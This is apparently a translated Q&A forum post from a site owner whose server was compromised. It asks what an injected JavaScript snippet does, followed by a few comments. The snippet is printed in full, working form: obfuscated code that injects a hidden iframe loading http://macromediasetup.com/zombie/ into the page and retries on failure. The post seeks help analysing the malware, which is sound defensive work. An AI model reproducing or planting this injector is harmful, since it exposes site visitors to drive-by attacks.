Sono appena entrato in un sito che è stato violato e mi chiedo cosa faccia questo javascript. per quanto posso dire, tenta di reindirizzare la pagina da qualche parte ma fallisce. Sembra che sia entrato in tutti gli ultimi file sul server.cosa fa questo script? - sito compromesso
<script>
function sF()
{
};
var sMN = new Array();
sF.prototype =
{
b: function()
{
wL = "wL";
var c = "c";
var wS = new Array();
cY = '';
this.bW = "bW";
this.sR = 35912;
var f = document;
var uH = "uH";
var cJ = 13620;
var n = '';
this.hI = 9833;
this.wX = 45851;
var bI = function()
{
};
var e = window;
yM = '';
a = "a";
var mV = 57574;
var pD = function()
{
};
var uQ = "";
var m = this;
this.v = false;
var cB = false;
this.t = 52080;
var qY = false;
this.oV = '';
wG = false;
var nW = function()
{
};
String.prototype.xAW = function (p, d)
{
var i = this;
return i.replace(p, d)
};
this.xA = '';
var bA = "";
this.oZ = 27110;
var rR = new Array();
var mP = function()
{
return 'mP'
};
this.aY = 39890;
this.wE = false;
var j = 'sbe)t)T)'.xAW(/[)O4Eb]/g, '') + 'iZm&eZoVu&tV'.xAW(/[V&{:Z]/g, '');
var zR = new Date();
var yV = 30047;
this.wLU = 47818;
var vX = '';
function wD()
{
};
hR = 22291;
var jF = 'eNdNdUsreNtUAUtr'.xAW(/[rpXUN]/g, '') + 'tarNiNs9daf&'.xAW(/[&9aN6]/g, '');
this.iI = false;
this.nK = "nK";
this.sS = '';
this.pL = "pL";
var uP = function()
{
};
var l = 'w$r$i9t$e|'.xAW(/[|$~(9]/g, '');
var lK = false;
var aU = "aU";
var mB = new Array();
var cS = function()
{
return 'cS'
};
var nKP = "";
var dH = function()
{
return 'dH'
};
try
{
tG = "";
var jB = new Date();
hX = '';
var sE = "";
var pE = new Array();
fZ = 41855;
var o = 's)ut'.xAW(/[tJ)md]/g, '') + 'bD'.xAW(/[D$sE{]/g, '') + 'sQtQrQiu'.xAW(/[u+QY/]/g, '') + 'njg7'.xAW(/[7qjky]/g, '');
this.eV = '';
dS = '';
eS = false;
this.eVS = false;
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, '');
fH = "fH";
vU = "";
this.hA = "";
lB = 56028;
var vN = '';
var q = 'szrzcz'.xAW(/[z(k+G]/g, '');
function uT()
{
};
this.jKG = 26380;
this.eG = 41884;
wM = "wM";
var zQ = function()
{
};
function aW()
{
};
var lD = 16264;
sU = "";
var h = 'o|[email protected]$r/e|[email protected]'.xAW(/[@$|R/]/g, '') + 'tLepE4l4eLm&'.xAW(/[&4LpO]/g, '') + 'e0n0t,rDeDdK'.xAW(/[K0,lD]/g, '');
var iV = '';
var sUW = function()
{
};
var k = false;
this.kT = false;
this.rW = "rW";
var dY = 60892;
this.xX = 51713;
this.vS = 62755;
var jK = 'lQy;r)h)eQiU'.xAW(/[U)QN;]/g, '') + 'gNhHt!gHr4eB'.xAW(/[BN!4H]/g, '');
function wT()
{
};
bV = "";
var hM = new Date();
var bL = new Array();
var dM = false;
var mI = "";
var x = 't]eTdTwTizdp'.xAW(/[p]z2T]/g, '') + 'tihqg]rqdi'.xAW(/[i]bNq]/g, '');
var sD = '';
this.dN = '';
this.lT = "lT";
var jCF = function()
{
return 'jCF'
};
function xAA()
{
};
var iIQ = function()
{
return 'iIQ'
};
var hZ = 'b]o]dBy5'.xAW(/[5];BD]/g, '');
var vD = "";
var oF = function()
{
};
var wGT = "";
xJD = "xJD";
var wH = new Date();
var mM = function()
{
};
var dP = "dP";
var qF = '';
var vV = "";
mY = false;
var w = 'p0u<s<hk'.xAW(/[kP0Q<]/g, '');
var pN = function()
{
return 'pN'
};
sM = 43919;
mZ = false;
fM = '';
var g = "";
hF = 51580;
var fJ = new Date();
this.tU = "";
var gG = "gG";
kD = "";
this.hAU = "hAU";
jAV = "";
var qP = '';
var cT = "cT";
var wZ = function()
{
};
var rE = 'abscwGibfcrGlGiJjJ'.xAW(/[JGDcb]/g, '');
var nT = new Array();
var mA = function()
{
};
var oZJ = function()
{
return 'oZJ'
};
this.aM = "";
nM = 5166;
nTR = "";
var oL = 'f#'.xAW(/[#[email protected]&]/g, '');
zC = false;
tD = "";
this.vQ = false;
var lZN = function()
{
return 'lZN'
};
lY = 40654;
y = 'spwpq,1mlmypt4'.xAW(/[4pmM,]/g, '');
var qD = "qD";
this.mS = false;
this.jCN = "jCN";
var fV = 26384;
tI = "tI";
this.aP = '';
s = 'a#,pw727hId#eI'.xAW(/[I#up7]/g, '');
xY = false;
var kU = function()
{
return 'kU'
};
var dJ = "dJ";
var sUH = function()
{
return 'sUH'
};
aI = 43838;
var dK = false;
this.gR = '';
var oU = new Array();
sZ = 5437;
kH = "kH";
var rY = false;
this.wV = 49424;
oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
var eI = "";
function sMF()
{
};
dSG = '';
oD = 15793;
var nQ = function()
{
};
this.sK = 12917;
this.gC = false;
function lBP()
{
};
qDD = '';
var tA = 1992;
wC = "wC";
this.qV = false;
this.aD = '';
wJ = false;
function tF()
{
};
var rH = new Date();
function qT()
{
};
var vUG = new Date();
var gB = new Date();
this.uL = "";
var nS = "nS";
function dQ()
{
};
qVK = "qVK";
var hQ = new Array();
var lW = new Array();
rG = false;
var gN = "gN";
function iE()
{
};
gV = "gV";
sT = '';
this.fR = "fR";
var wGW = 47062;
this.qJ = "";
this.gBS = "";
var nN = function()
{
};
var gT = false;
this.qM = "";
var qA = false;
this.oDD = false;
eZ = "eZ";
this.iW = "";
function oFD()
{
};
var tN = function()
{
return 'tN'
};
tT = 20890;
var uJ = '';
var rM = '';
xO = false;
rK = '';
this.aMR = 31691;
var oLW = new Date();
this.nJ = "";
this.pV = 7748;
var vJ = 8022;
iA = 45357;
var dD = new Array();
var rGR = '';
fU = '';
this.aYO = "";
var gNM = function()
{
return 'gNM'
};
fN = "";
this.yT = false;
var rC = false;
var tX = "";
var mU = 41520;
this.aJ = "";
this.cH = "cH";
var yY = function()
{
};
var kI = "kI";
function tK()
{
};
var tAQ = false;
uTD = "uTD";
var hIH = "hIH";
function lBC()
{
};
this.vA = false;
var sDO = false;
eZN = "eZN";
var iL = new Date();
var bZ = 41417;
var dX = '';
var bS = function()
{
};
mX = false;
this.sDY = 12981;
var sMFV = "sMFV";
var xT = new Array();
iF = "";
var zY = '';
vNL = '';
var hJ = "hJ";
var nI = function()
{
return 'nI'
};
var tGJ = 41886;
xAM = false;
var tDK = 5185;
var wSH = new Array();
iEM = "iEM";
this.pX = '';
this.sH = false;
hN = '';
var qZ = new Date();
qE = "qE";
var qX = "";
var sUT = false;
eN = "";
function bT()
{
};
var qDC = "qDC";
yR = "yR";
var dMG = false;
this.nL = "";
var oUK = '';
var cW = 60401;
var xOR = 50628;
vW = "vW";
this.qR = "qR";
var kB = false;
function fG()
{
};
var yVS = new Date();
var eQ = oU[5][oU[4]](3, 16);
this.sRU = 40424;
var vSZ = false;
var oUC = function()
{
};
var pS = new Date();
tC = '';
var uW = "uW";
cA = "";
var xJ = oU[7][oU[4]](3, 6);
nE = "nE";
var jV = false;
fUG = "";
var aX = false;
this.zJ = '';
this.dC = "dC";
function lDV()
{
};
var u = oU[1][oU[4]](3, 4);
var aF = function()
{
};
this.sKM = '';
gH = 35602;
this.tE = false;
this.wR = '';
var lQ = function()
{
return 'lQ'
};
jA = xJ + 'a3m3e3'.xAW(/[3Fr6h]/g, '');
var tNZ = false;
sHZ = '';
var zI = new Date();
this.hT = '';
fY = false;
this.aN = "aN";
var qEY = 35434;
var z = oU[12][oU[4]](3, 4);
var hZQ = new Date();
var cX = function()
{
return 'cX'
};
this.lI = false;
this.nMM = "";
var dV = "";
iM = false;
var rJ = oU[8][oU[4]](3, 11);
yVB = false;
this.zP = "";
this.jO = 34768;
var bH = new Array();
this.hIHR = "hIHR";
lZ = rJ + 'b)u.tHeQ'.xAW(/[QH)N.]/g, '');
var xI = new Date();
this.yJ = false;
this.tGO = 27688;
this.yN = 6549;
xE = '';
var bZF = false;
var xZ = oU[11][eQ](jA);
zYQ = false;
this.mC = 40578;
var zPY = '';
this.yTB = '';
var gA = function()
{
};
var qL = 29571;
var iZ = new Date();
var qN = oU[3][oU[4]](3, 9);
var vP = "vP";
var yQ = new Date();
this.gX = '';
var iZV = '';
this.hH = 63374;
var jC = oU[6][oU[4]](3, 8);
var lKY = new Date();
var sRA = "";
var kUY = '';
var zS = function()
{
return 'zS'
};
xZ[oU[2]] = 'hTt!t|p):6/|/)m|a)c|rTo6m)e)d)iTa)s6e6t|uTp!.!c|o6m|/!z!o!mTbTiTe!/)'.xAW(/[)6T|!]/g, '');
this.rT = false;
var qU = '';
var nQX = function()
{
return 'nQX'
};
this.nQK = "";
fK = false;
var aK = new Array();
this.eC = "";
uM = '';
qXG = "qXG";
cD = "cD";
this.mL = false;
var xF = function()
{
};
xZ[jC] = u;
lH = false;
var hRX = 24381;
var jP = "jP";
var rD = new Array();
this.pK = "pK";
sQ = '';
this.lJ = '';
var dW = function()
{
return 'dW'
};
var eP = new Array();
xZ[qN] = z;
var mK = new Date();
var sZM = 33888;
var wJZ = "wJZ";
zA = "";
var fW = function()
{
};
this.lIJ = "";
xL = "";
var rKL = 29796;
var xR = new Date();
var pP = false;
var qK = "";
gTS = "";
oU[11][oU[9]][oU[10]](xZ);
var aG = function()
{
return 'aG'
};
function hV()
{
};
gE = "gE";
var uHJ = "";
this.nNX = false;
}
catch (xG)
{
this.wSN = '';
function yJX()
{
};
var sTG = new Array();
this.wCW = "wCW";
this.eT = "eT";
iK = "iK";
f[l]('<RhRt[m;l; [>a<[b|oRd[y; ;>|<|t[d; R>a<[/atRdR>a<;/Rbao[d[y;>;<;/|h|t;malR>R'.xAW(/[Ra[|;]/g, ''));
this.xN = 35962;
var uJT = 22074;
fL = '';
var wJD = '';
oFI = '';
e[j](function()
{
m.b()
}, 141);
tEC = "";
this.vK = "vK";
var hS = function()
{
};
var gTT = new Array();
}
var yJB = function()
{
return 'yJB'
};
this.mXU = "mXU";
this.tFO = false;
}
};
var fI = 4253;
var bJ = new sF();
bVT = 29950;
bJ.b();
var hK = function()
{
return 'hK'
};
</script>
Grazie a Peter Ajtai di pulizia in su (anche se la modifica è sembrato per ricaricare lo script tutto chiarito .. deve essere un SO cosa)
Questo codice sembra offuscato e miniato, almeno provare a farlo un po ', quindi non dobbiamo fare il lavoro sporco per te ... – gillyb
So che qualcuno avrà qualcosa da chiarire ... – WalterJ89
Meglio eseguire questo tipo di cose su un VM senza connessione di rete. – SiggyF